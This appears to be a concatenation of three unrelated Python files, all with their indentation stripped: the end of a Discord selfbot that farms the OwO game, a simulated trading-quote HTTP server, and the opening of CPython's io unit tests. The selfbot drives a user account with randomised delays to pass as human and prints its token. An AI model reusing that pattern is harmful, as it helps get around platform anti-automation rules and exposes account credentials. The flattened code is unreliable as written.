command=random.choice(bot.commands)
command2=random.choice(bot.commands)
client.typingAction(str(bot.channel))
client.sendMessage(str(bot.channel), command)
print(f"{at()}{bot.color.okgreen} [SENT] {bot.color.reset} {command}")
if issuechecker2() == "nocap":
client.sendMessage(str(bot.channel), "owo hunt")
if not owodes:
exit()
if not command2==command:
client.typingAction(str(bot.channel))
time.sleep(13)
client.sendMessage(str(bot.channel), command2)
print(f"{at()}{bot.color.okgreen} [SENT] {bot.color.reset} {command2}")
time.sleep(random.randint(wbm[0],wbm[1]))
def owopray():
client.sendMessage(str(bot.channel), "owo pray")
print(f"{at()}{bot.color.okgreen} [SENT] {bot.color.reset} owo pray")
time.sleep(13)
def gems():
client.typingAction(str(bot.channel))
time.sleep(5)
client.sendMessage(str(bot.channel), "owo inv")
print(f"{at()}{bot.color.okgreen} [SENT] {bot.color.reset} owo inv")
time.sleep(7)
msgs=client.getMessages(str(bot.channel), num=5)
msgs=json.loads(msgs.text)
inv = 0
for msgone in msgs:
if msgone['author']['id']==str(bot.owoid) and 'Inventory' in msgone['content']:
inv=re.findall(r'`(.*?)`', msgone['content'])
if not inv:
security()
else:
if '50' in inv:
client.sendMessage(str(bot.channel), "owo lb all")
print(f"{at()}{bot.color.okgreen} [SENT] {bot.color.reset} owo lb all")
time.sleep(13)
gems()
return
for item in inv:
try:
if int(item) > 100:
inv.pop(inv.index(item)) #weapons
except: #backgounds etc
inv.pop(inv.index(item))
tier = [[],[],[]]
print(f"{at()}{bot.color.okblue} [INFO] {bot.color.reset} Found {len(inv)} gems Inventory")
for gem in inv:
gem =int(gem)
if 50 < gem < 60:
tier[0].append(gem)
elif 60 < gem < 70:
tier[1].append(gem)
elif 70 < gem < 80:
tier[2].append(gem)
for level in range(0,3):
if not len(tier[level]) == 0:
client.sendMessage(str(bot.channel), "owo use "+str(max(tier[level])))
print(f"{at()}{bot.color.okgreen} [SENT] {bot.color.reset} owo use {str(max(tier[level]))}")
time.sleep(7)
def loopie():
x=True
pray = 0
gem=pray
main=time.time()
while x:
runner()
if time.time() - pray > random.randint(300, 600):
security()
owopray()
pray=time.time()
if time.time() - gem > random.randint(600, 1000):
security()
gems()
gem=time.time()
if time.time() - main > random.randint(1000, 2000):
time.sleep(random.randint(300, 600))
security ()
main=time.time()
@client.gateway.command
def defination1(resp):
global once
if not once:
once=True
if __name__ == '__main__':
lol=multiprocessing.Process(target=loopie)
lol.run()
print(bot.token)
client.gateway.run()
|
server3.py
|
################################################################################
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
#from itertools import izip
from random import normalvariate, random
from datetime import timedelta, datetime
import csv
import dateutil.parser
import os.path
import operator
import json
import re
import threading
#from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
import http.server
from socketserver import ThreadingMixIn
################################################################################
#
# Config
# Sim params
REALTIME = True
SIM_LENGTH = timedelta(days = 365 * 5)
MARKET_OPEN = datetime.today().replace(hour = 0, minute = 30, second = 0)
# Market parms
# min / max / std
SPD = (2.0, 6.0, 0.1)
PX = (60.0, 150.0, 1)
FREQ = (12, 36, 50)
# Trades
OVERLAP = 4
################################################################################
#
# Test Data
def bwalk(min, max, std):
""" Generates a bounded random walk. """
rng = max - min
while True:
max += normalvariate(0, std)
yield abs((max % (rng * 2)) - rng) + min
def market(t0 = MARKET_OPEN):
""" Generates a random series of market conditions,
(time, price, spread).
"""
for hours, px, spd in zip(bwalk(*FREQ), bwalk(*PX), bwalk(*SPD)):
yield t0, px, spd
t0 += timedelta(hours = abs(hours))
def orders(hist):
""" Generates a random set of limit orders (time, side, price, size) from
a series of market conditions.
"""
for t, px, spd in hist:
stock = 'ABC' if random() > 0.5 else 'DEF'
side, d = ('sell', 2) if random() > 0.5 else ('buy', -2)
order = round(normalvariate(px + (spd / d), spd / OVERLAP), 2)
size = int(abs(normalvariate(0, 100)))
yield t, stock, side, order, size
################################################################################
#
# Order Book
def add_book(book, order, size, _age = 10):
""" Add a new order and size to a book, and age the rest of the book. """
yield order, size, _age
for o, s, age in book:
if age > 0:
yield o, s, age - 1
def clear_order(order, size, book, op = operator.ge, _notional = 0):
""" Try to clear a sized order against a book, returning a tuple of
(notional, new_book) if successful, and None if not. _notional is a
recursive accumulator and should not be provided by the caller.
"""
(top_order, top_size, age), tail = book[0], book[1:]
if op(order, top_order):
_notional += min(size, top_size) * top_order
sdiff = top_size - size
if sdiff > 0:
return _notional, list(add_book(tail, top_order, sdiff, age))
elif len(tail) > 0:
return clear_order(order, -sdiff, tail, op, _notional)
def clear_book(buy = None, sell = None):
""" Clears all crossed orders from a buy and sell book, returning the new
books uncrossed.
"""
while buy and sell:
order, size, _ = buy[0]
new_book = clear_order(order, size, sell)
if new_book:
sell = new_book[1]
buy = buy[1:]
else:
break
return buy, sell
def order_book(orders, book, stock_name):
""" Generates a series of order books from a series of orders. Order books
are mutable lists, and mutating them during generation will affect the
next turn!
"""
for t, stock, side, order, size in orders:
if stock_name == stock:
new = add_book(book.get(side, []), order, size)
book[side] = sorted(new, reverse = side == 'buy', key = lambda x: x[0])
bids, asks = clear_book(**book)
yield t, bids, asks
################################################################################
#
# Test Data Persistence
def generate_csv():
""" Generate a CSV of order history. """
with open('test.csv', 'wb') as f:
writer = csv.writer(f)
for t, stock, side, order, size in orders(market()):
if t > MARKET_OPEN + SIM_LENGTH:
break
writer.writerow([t, stock, side, order, size])
def read_csv():
""" Read a CSV or order history into a list. """
with open('test.csv', 'rt') as f:
for time, stock, side, order, size in csv.reader(f):
yield dateutil.parser.parse(time), stock, side, float(order), int(size)
################################################################################
#
# Server
class ThreadedHTTPServer(ThreadingMixIn, http.server.HTTPServer):
""" Boilerplate class for a multithreaded HTTP Server, with working
shutdown.
"""
allow_reuse_address = True
def shutdown(self):
""" Override MRO to shutdown properly. """
self.socket.close()
http.server.HTTPServer.shutdown(self)
def route(path):
""" Decorator for a simple bottle-like web framework. Routes path to the
decorated method, with the rest of the path as an argument.
"""
def _route(f):
setattr(f, '__route__', path)
return f
return _route
def read_params(path):
""" Read query parameters into a dictionary if they are parseable,
otherwise returns None.
"""
query = path.split('?')
if len(query) > 1:
query = query[1].split('&')
return dict(map(lambda x: x.split('='), query))
def get(req_handler, routes):
""" Map a request to the appropriate route of a routes instance. """
for name, handler in routes.__class__.__dict__.items():
if hasattr(handler, "__route__"):
if None != re.search(handler.__route__, req_handler.path):
req_handler.send_response(200)
req_handler.send_header('Content-Type', 'application/json')
req_handler.send_header('Access-Control-Allow-Origin', '*')
req_handler.end_headers()
params = read_params(req_handler.path)
data = json.dumps(handler(routes, params)) + '\n'
req_handler.wfile.write(bytes(data, encoding = 'utf-8'))
return
def run(routes, host = '0.0.0.0', port = 8080):
""" Runs a class as a server whose methods have been decorated with
@route.
"""
class RequestHandler(http.server.BaseHTTPRequestHandler):
def log_message(self, *args, **kwargs):
pass
def do_GET(self):
get(self, routes)
server = ThreadedHTTPServer((host, port), RequestHandler)
thread = threading.Thread(target = server.serve_forever)
thread.daemon = True
thread.start()
print ('HTTP server started on port 8080')
while True:
from time import sleep
sleep(1)
server.shutdown()
server.start()
server.waitForThread()
################################################################################
#
# App
ops = {
'buy': operator.le,
'sell': operator.ge,
}
class App(object):
""" The trading game server application. """
def __init__(self):
self._book_1 = dict()
self._book_2 = dict()
self._data_1 = order_book(read_csv(), self._book_1, 'ABC')
self._data_2 = order_book(read_csv(), self._book_2, 'DEF')
self._rt_start = datetime.now()
self._sim_start, _, _ = next(self._data_1)
self.read_10_first_lines()
@property
def _current_book_1(self):
for t, bids, asks in self._data_1:
if REALTIME:
while t > self._sim_start + (datetime.now() - self._rt_start):
yield t, bids, asks
else:
yield t, bids, asks
@property
def _current_book_2(self):
for t, bids, asks in self._data_2:
if REALTIME:
while t > self._sim_start + (datetime.now() - self._rt_start):
yield t, bids, asks
else:
yield t, bids, asks
def read_10_first_lines(self):
for _ in iter(range(10)):
next(self._data_1)
next(self._data_2)
@route('/query')
def handle_query(self, x):
""" Takes no arguments, and yields the current top of the book; the
best bid and ask and their sizes
"""
try:
t1, bids1, asks1 = next(self._current_book_1)
t2, bids2, asks2 = next(self._current_book_2)
except Exception as e:
print ("error getting stocks...reinitalizing app")
self.__init__()
t1, bids1, asks1 = next(self._current_book_1)
t2, bids2, asks2 = next(self._current_book_2)
t = t1 if t1 > t2 else t2
print ('Query received @ t%s' % t)
return [{
'id': x and x.get('id', None),
'stock': 'ABC',
'timestamp': str(t),
'top_bid': bids1 and {
'price': bids1[0][0],
'size': bids1[0][1]
},
'top_ask': asks1 and {
'price': asks1[0][0],
'size': asks1[0][1]
}
},
{
'id': x and x.get('id', None),
'stock': 'DEF',
'timestamp': str(t),
'top_bid': bids2 and {
'price': bids2[0][0],
'size': bids2[0][1]
},
'top_ask': asks2 and {
'price': asks2[0][0],
'size': asks2[0][1]
}
}]
################################################################################
#
# Main
if __name__ == '__main__':
if not os.path.isfile('test.csv'):
print ("No data found, generating...")
generate_csv()
run(App())
|
test_io.py
|
"""Unit tests for the io module."""
# Tests of io are scattered over the test suite:
# * test_bufio - tests file buffering
# * test_memoryio - tests BytesIO and StringIO
# * test_fileio - tests FileIO
# * test_file - tests the file interface
# * test_io - tests everything else in the io module
# * test_univnewlines - tests universal newline support
# * test_largefile - tests operations on a file greater than 2**32 bytes
# (only enabled with -ulargefile)
################################################################################
# ATTENTION TEST WRITERS!!!
################################################################################
# When writing tests for io, it's important to test both the C and Python
# implementations. This is usually done by writing a base test that refers to
# the type it is testing as a attribute. Then it provides custom subclasses to
# test both implementations. This file has lots of examples.
################################################################################
from __future__ import print_function
from __future__ import unicode_literals
import os
import sys
import time
import array
import random
import unittest
import weakref
import abc
import signal
import errno
from itertools import cycle, count
from collections import deque
from test import test_support as support
import codecs
import io # C implementation of io
import _pyio as pyio # Python implementation of io
try:
import threading
except ImportError:
threading = None
try:
import fcntl
except ImportError:
fcntl = None
__metaclass__ = type
bytes = support.py3k_bytes
def _default_chunk_size():
"""Get the default TextIOWrapper chunk size"""
with io.open(__file__, "r", encoding="latin1") as f:
return f._CHUNK_SIZE
class MockRawIOWithoutRead:
"""A RawIO implementation without read(), so as to exercise the default
RawIO.read() which calls readinto()."""
def __init__(self, read_stack=()):
self._read_stack = list(read_stack)
self._write_stack = []
self._reads = 0
self._extraneous_reads = 0
def write(self, b):
self._write_stack.append(bytes(b))
return len(b)
def writable(self):
return True
def fileno(self):
return 42
def readable(self):
return True
def seekable(self):
return True
def seek(self, pos, whence):
return 0 # wrong but we gotta return something
def tell(self):
return 0 # same comment as above
def readinto(self, buf):
self._reads += 1
max_len = len(buf)
try:
data = self._read_stack[0]
except IndexError:
self._extraneous_reads += 1
return 0
if data is None:
del self._read_stack[0]
return None
n = len(data)
if len(data) <= max_len:
del self._read_stack[0]
buf[:n] = data
return n
else:
buf[:] = data[:max_len]
self._read_stack[0] = data[max_len:]
return max_len
def truncate(self, pos=None):
return pos
class CMockRawIOWithoutRead(MockRawIOWithoutRead, io.RawIOBase):
pass
class PyMockRawIOWithoutRead(MockRawIOWithoutRead, pyio.RawIOBase):
pass
class MockRawIO(MockRawIOWithoutRead):
def read(self, n=None):
self._reads += 1
try:
return self._read_stack.pop(0)
except:
self._extraneous_reads += 1
return b""
class CMockRawIO(MockRawIO, io.RawIOBase):
pass
class PyMockRawIO(MockRawIO, pyio.RawIOBase):
pass
class MisbehavedRawIO(MockRawIO):
def write(self, b):
return MockRawIO.write(self, b) * 2
def read(self, n=None):
return MockRawIO.read(self, n) * 2
def seek(self, pos, whence):
return -123
def tell(self):
return -456
def readinto(self, buf):
MockRawIO.readinto(self, buf)
return len(buf) * 5
class CMisbehavedRawIO(MisbehavedRawIO, io.RawIOBase):
pass
class PyMisbehavedRawIO(MisbehavedRawIO, pyio.RawIOBase):
pass
class CloseFailureIO(MockRawIO):
closed = 0
def close(self):
if not self.closed:
self.closed = 1
raise IOError
class CCloseFailureIO(CloseFailureIO, io.RawIOBase):
pass
class PyCloseFailureIO(CloseFailureIO, pyio.RawIOBase):
pass
class MockFileIO:
def __init__(self, data):
self.read_history = []
super(MockFileIO, self).__init__(data)
def read(self, n=None):
res = super(MockFileIO, self).read(n)
self.read_history.append(None if res is None else len(res))
return res
def readinto(self, b):
res = super(MockFileIO, self).readinto(b)
self.read_history.append(res)
return res
class CMockFileIO(MockFileIO, io.BytesIO):
pass
class PyMockFileIO(MockFileIO, pyio.BytesIO):
pass
class MockNonBlockWriterIO:
def __init__(self):
self._write_stack = []
self._blocker_char = None
def pop_written(self):
s = b"".join(self._write_stack)
self._write_stack[:] = []
return s
def block_on(self, char):
"""Block when a given char is encountered."""
self._blocker_char = char
def readable(self):
return True
def seekable(self):
return True
def writable(self):
return True
def write(self, b):
b = bytes(b)
n = -1
if self._blocker_char:
try:
n = b.index(self._blocker_char)
except ValueError:
pass
else:
if n > 0:
# write data up to the first blocker
self._write_stack.append(b[:n])
return n
else:
# cancel blocker and indicate would block
self._blocker_char = None
return None
self._write_stack.append(b)
return len(b)
class CMockNonBlockWriterIO(MockNonBlockWriterIO, io.RawIOBase):
BlockingIOError = io.BlockingIOError
class PyMockNonBlockWriterIO(MockNonBlockWriterIO, pyio.RawIOBase):
BlockingIOError = pyio.BlockingIOError
class IOTest(unittest.TestCase):
def setUp(self):
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def write_ops(self, f):
self.assertEqual(f.write(b"blah."), 5)
f.truncate(0)
self.assertEqual(f.tell(), 5)
f.seek(0)
self.assertEqual(f.write(b"blah."), 5)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"Hello."), 6)
self.assertEqual(f.tell(), 6)
self.assertEqual(f.seek(-1, 1), 5)
self.assertEqual(f.tell(), 5)
self.assertEqual(f.write(bytearray(b" world\n\n\n")), 9)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"h"), 1)
self.assertEqual(f.seek(-1, 2), 13)
self.assertEqual(f.tell(), 13)
self.assertEqual(f.truncate(12), 12)
self.assertEqual(f.tell(), 13)
self.assertRaises(TypeError, f.seek, 0.0)
def read_ops(self, f, buffered=False):
data = f.read(5)
self.assertEqual(data, b"hello")
data = bytearray(data)
self.assertEqual(f.readinto(data), 5)
self.assertEqual(data, b" worl")
self.assertEqual(f.readinto(data), 2)
self.assertEqual(len(data), 5)
self.assertEqual(data[:2], b"d\n")
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(20), b"hello world\n")
self.assertEqual(f.read(1), b"")
self.assertEqual(f.readinto(bytearray(b"x")), 0)
self.assertEqual(f.seek(-6, 2), 6)
self.assertEqual(f.read(5), b"world")
self.assertEqual(f.read(0), b"")
self.assertEqual(f.readinto(bytearray()), 0)
self.assertEqual(f.seek(-6, 1), 5)
self.assertEqual(f.read(5), b" worl")
self.assertEqual(f.tell(), 10)
self.assertRaises(TypeError, f.seek, 0.0)
if buffered:
f.seek(0)
self.assertEqual(f.read(), b"hello world\n")
f.seek(6)
self.assertEqual(f.read(), b"world\n")
self.assertEqual(f.read(), b"")
LARGE = 2**31
def large_file_ops(self, f):
assert f.readable()
assert f.writable()
self.assertEqual(f.seek(self.LARGE), self.LARGE)
self.assertEqual(f.tell(), self.LARGE)
self.assertEqual(f.write(b"xxx"), 3)
self.assertEqual(f.tell(), self.LARGE + 3)
self.assertEqual(f.seek(-1, 1), self.LARGE + 2)
self.assertEqual(f.truncate(), self.LARGE + 2)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 2)
self.assertEqual(f.truncate(self.LARGE + 1), self.LARGE + 1)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 1)
self.assertEqual(f.seek(-1, 2), self.LARGE)
self.assertEqual(f.read(2), b"x")
def test_invalid_operations(self):
# Try writing on a file opened in read mode and vice-versa.
for mode in ("w", "wb"):
with self.open(support.TESTFN, mode) as fp:
self.assertRaises(IOError, fp.read)
self.assertRaises(IOError, fp.readline)
with self.open(support.TESTFN, "rb") as fp:
self.assertRaises(IOError, fp.write, b"blah")
self.assertRaises(IOError, fp.writelines, [b"blah\n"])
with self.open(support.TESTFN, "r") as fp:
self.assertRaises(IOError, fp.write, "blah")
self.assertRaises(IOError, fp.writelines, ["blah\n"])
def test_raw_file_io(self):
with self.open(support.TESTFN, "wb", buffering=0) as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f)
def test_buffered_file_io(self):
with self.open(support.TESTFN, "wb") as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f, True)
def test_readline(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"abc\ndef\nxyzzy\nfoo\x00bar\nanother line")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.readline(), b"abc\n")
self.assertEqual(f.readline(10), b"def\n")
self.assertEqual(f.readline(2), b"xy")
self.assertEqual(f.readline(4), b"zzy\n")
self.assertEqual(f.readline(), b"foo\x00bar\n")
self.assertEqual(f.readline(None), b"another line")
self.assertRaises(TypeError, f.readline, 5.3)
with self.open(support.TESTFN, "r") as f:
self.assertRaises(TypeError, f.readline, 5.3)
def test_raw_bytes_io(self):
f = self.BytesIO()
self.write_ops(f)
data = f.getvalue()
self.assertEqual(data, b"hello world\n")
f = self.BytesIO(data)
self.read_ops(f, True)
def test_large_file_ops(self):
# On Windows and Mac OSX this test comsumes large resources; It takes
# a long time to build the >2GB file and takes >2GB of disk space
# therefore the resource must be enabled to run this test.
if sys.platform[:3] == 'win' or sys.platform == 'darwin':
if not support.is_resource_enabled("largefile"):
print("\nTesting large file ops skipped on %s." % sys.platform,
file=sys.stderr)
print("It requires %d bytes and a long time." % self.LARGE,
file=sys.stderr)
print("Use 'regrtest.py -u largefile test_io' to run it.",
file=sys.stderr)
return
with self.open(support.TESTFN, "w+b", 0) as f:
self.large_file_ops(f)
with self.open(support.TESTFN, "w+b") as f:
self.large_file_ops(f)
def test_with_open(self):
for bufsize in (0, 1, 100):
f = None
with self.open(support.TESTFN, "wb", bufsize) as f:
f.write(b"xxx")
self.assertEqual(f.closed, True)
f = None
try:
with self.open(support.TESTFN, "wb", bufsize) as f:
1 // 0
except ZeroDivisionError:
self.assertEqual(f.closed, True)
else:
self.fail("1 // 0 didn't raise an exception")
# issue 5008
def test_append_mode_tell(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "ab", buffering=0) as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "ab") as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "a") as f:
self.assertTrue(f.tell() > 0)
def test_destructor(self):
record = []
class MyFileIO(self.FileIO):
def __del__(self):
record.append(1)
try:
f = super(MyFileIO, self).__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super(MyFileIO, self).close()
def flush(self):
record.append(3)
super(MyFileIO, self).flush()
f = MyFileIO(support.TESTFN, "wb")
f.write(b"xxx")
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def _check_base_destructor(self, base):
record = []
class MyIO(base):
def __init__(self):
# This exercises the availability of attributes on object
# destruction.
# (in the C version, close() is called by the tp_dealloc
# function, not by __del__)
self.on_del = 1
self.on_close = 2
self.on_flush = 3
def __del__(self):
record.append(self.on_del)
try:
f = super(MyIO, self).__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(self.on_close)
super(MyIO, self).close()
def flush(self):
record.append(self.on_flush)
super(MyIO, self).flush()
f = MyIO()
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_IOBase_destructor(self):
self._check_base_destructor(self.IOBase)
def test_RawIOBase_destructor(self):
self._check_base_destructor(self.RawIOBase)
def test_BufferedIOBase_destructor(self):
self._check_base_destructor(self.BufferedIOBase)
def test_TextIOBase_destructor(self):
self._check_base_destructor(self.TextIOBase)
def test_close_flushes(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def test_array_writes(self):
a = array.array(b'i', range(10))
n = len(a.tostring())
with self.open(support.TESTFN, "wb", 0) as f:
self.assertEqual(f.write(a), n)
with self.open(support.TESTFN, "wb") as f:
self.assertEqual(f.write(a), n)
def test_closefd(self):
self.assertRaises(ValueError, self.open, support.TESTFN, 'w',
closefd=False)
def test_read_closed(self):
with self.open(support.TESTFN, "w") as f:
f.write("egg\n")
with self.open(support.TESTFN, "r") as f:
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.read(), "egg\n")
file.seek(0)
file.close()
self.assertRaises(ValueError, file.read)
def test_no_closefd_with_filename(self):
# can't use closefd in combination with a file name
self.assertRaises(ValueError, self.open, support.TESTFN, "r", closefd=False)
def test_closefd_attr(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"egg\n")
with self.open(support.TESTFN, "r") as f:
self.assertEqual(f.buffer.raw.closefd, True)
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.buffer.raw.closefd, False)
def test_garbage_collection(self):
# FileIO objects are collected, and collecting them flushes
# all data to disk.
f = self.FileIO(support.TESTFN, "wb")
f.write(b"abcxxx")
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertTrue(wr() is None, wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"abcxxx")
def test_unbounded_file(self):
# Issue #1174606: reading from an unbounded stream such as /dev/zero.
zero = "/dev/zero"
if not os.path.exists(zero):
self.skipTest("{0} does not exist".format(zero))
if sys.maxsize > 0x7FFFFFFF:
self.skipTest("test can only run in a 32-bit address space")
if support.real_max_memuse < support._2G:
self.skipTest("test requires at least 2GB of memory")
with self.open(zero, "rb", buffering=0) as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "rb") as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "r") as f:
self.assertRaises(OverflowError, f.read)
def test_flush_error_on_close(self):
f = self.open(support.TESTFN, "wb", buffering=0)
def bad_flush():
raise IOError()
f.flush = bad_flush
self.assertRaises(IOError, f.close) # exception not swallowed
def test_multi_close(self):
f = self.open(support.TESTFN, "wb", buffering=0)
f.close()
f.close()
f.close()
self.assertRaises(ValueError, f.flush)
def test_RawIOBase_read(self):
# Exercise the default RawIOBase.read() implementation (which calls
# readinto() internally).
rawio = self.MockRawIOWithoutRead((b"abc", b"d", None, b"efg", None))
self.assertEqual(rawio.read(2), b"ab")
self.assertEqual(rawio.read(2), b"c")
self.assertEqual(rawio.read(2), b"d")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"ef")
self.assertEqual(rawio.read(2), b"g")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"")
def test_fileio_closefd(self):
# Issue #4841
with self.open(__file__, 'rb') as f1, \
self.open(__file__, 'rb') as f2:
fileio = self.FileIO(f1.fileno(), closefd=False)
# .__init__() must not close f1
fileio.__init__(f2.fileno(), closefd=False)
f1.readline()
# .close() must not close f2
fileio.close()
f2.readline()
class CIOTest(IOTest):
def test_IOBase_finalize(self):
# Issue #12149: segmentation fault on _PyIOBase_finalize when both a
# class which inherits IOBase and an object of this class are caught
# in a reference cycle and close() is already in the method cache.
class MyIO(self.IOBase):
def close(self):
pass
# create an instance to populate the method cache
MyIO()
obj = MyIO()
obj.obj = obj
wr = weakref.ref(obj)
del MyIO
del obj
support.gc_collect()
self.assertTrue(wr() is None, wr)
class PyIOTest(IOTest):
test_array_writes = unittest.skip(
"len(array.array) returns number of elements rather than bytelength"
)(IOTest.test_array_writes)
class CommonBufferedTests:
# Tests common to BufferedReader, BufferedWriter and BufferedRandom
def test_detach(self):
raw = self.MockRawIO()
buf = self.tp(raw)
self.assertIs(buf.detach(), raw)
self.assertRaises(ValueError, buf.detach)
def test_fileno(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertEqual(42, bufio.fileno())
def test_no_fileno(self):
# XXX will we always have fileno() function? If so, kill
# this test. Else, write it.
pass
def test_invalid_args(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
# Invalid whence
self.assertRaises(ValueError, bufio.seek, 0, -1)
self.assertRaises(ValueError, bufio.seek, 0, 3)
def test_override_destructor(self):
tp = self.tp
record = []
class MyBufferedIO(tp):
def __del__(self):
record.append(1)
try:
f = super(MyBufferedIO, self).__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super(MyBufferedIO, self).close()
def flush(self):
record.append(3)
super(MyBufferedIO, self).flush()
rawio = self.MockRawIO()
bufio = MyBufferedIO(rawio)
writable = bufio.writable()
del bufio
support.gc_collect()
if writable:
self.assertEqual(record, [1, 2, 3])
else:
self.assertEqual(record, [1, 2])
def test_context_manager(self):
# Test usability as a context manager
rawio = self.MockRawIO()
bufio = self.tp(rawio)
def _with():
with bufio:
pass
_with()
# bufio should now be closed, and using it a second time should raise
# a ValueError.
self.assertRaises(ValueError, _with)
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
def f():
self.tp(rawio).xyzzy
with support.captured_output("stderr") as s:
self.assertRaises(AttributeError, f)
s = s.getvalue().strip()
if s:
# The destructor *may* have printed an unraisable error, check it
self.assertEqual(len(s.splitlines()), 1)
self.assertTrue(s.startswith("Exception IOError: "), s)
self.assertTrue(s.endswith(" ignored"), s)
def test_repr(self):
raw = self.MockRawIO()
b = self.tp(raw)
clsname = "%s.%s" % (self.tp.__module__, self.tp.__name__)
self.assertEqual(repr(b), "<%s>" % clsname)
raw.name = "dummy"
self.assertEqual(repr(b), "<%s name=u'dummy'>" % clsname)
raw.name = b"dummy"
self.assertEqual(repr(b), "<%s name='dummy'>" % clsname)
def test_flush_error_on_close(self):
raw = self.MockRawIO()
def bad_flush():
raise IOError()
raw.flush = bad_flush
b = self.tp(raw)
self.assertRaises(IOError, b.close) # exception not swallowed
def test_multi_close(self):
raw = self.MockRawIO()
b = self.tp(raw)
b.close()
b.close()
b.close()
self.assertRaises(ValueError, b.flush)
def test_readonly_attributes(self):
raw = self.MockRawIO()
buf = self.tp(raw)
x = self.MockRawIO()
with self.assertRaises((AttributeError, TypeError)):
buf.raw = x
class SizeofTest:
@support.cpython_only
def test_sizeof(self):
bufsize1 = 4096
bufsize2 = 8192
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize1)
size = sys.getsizeof(bufio) - bufsize1
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize2)
self.assertEqual(sys.getsizeof(bufio), size + bufsize2)
class BufferedReaderTest(unittest.TestCase, CommonBufferedTests):
read_mode = "rb"
def test_constructor(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(b"abc", bufio.read())
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
rawio = self.MockRawIO([b"abc"])
bufio.__init__(rawio)
self.assertEqual(b"abc", bufio.read())
def test_read(self):
for arg in (None, 7):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(arg))
# Invalid args
self.assertRaises(ValueError, bufio.read, -2)
def test_read1(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"a", bufio.read(1))
self.assertEqual(b"b", bufio.read1(1))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"c", bufio.read1(100))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"d", bufio.read1(100))
self.assertEqual(rawio._reads, 2)
self.assertEqual(b"efg", bufio.read1(100))
self.assertEqual(rawio._reads, 3)
self.assertEqual(b"", bufio.read1(100))
self.assertEqual(rawio._reads, 4)
# Invalid args
self.assertRaises(ValueError, bufio.read1, -1)
def test_readinto(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
b = bytearray(2)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ab")
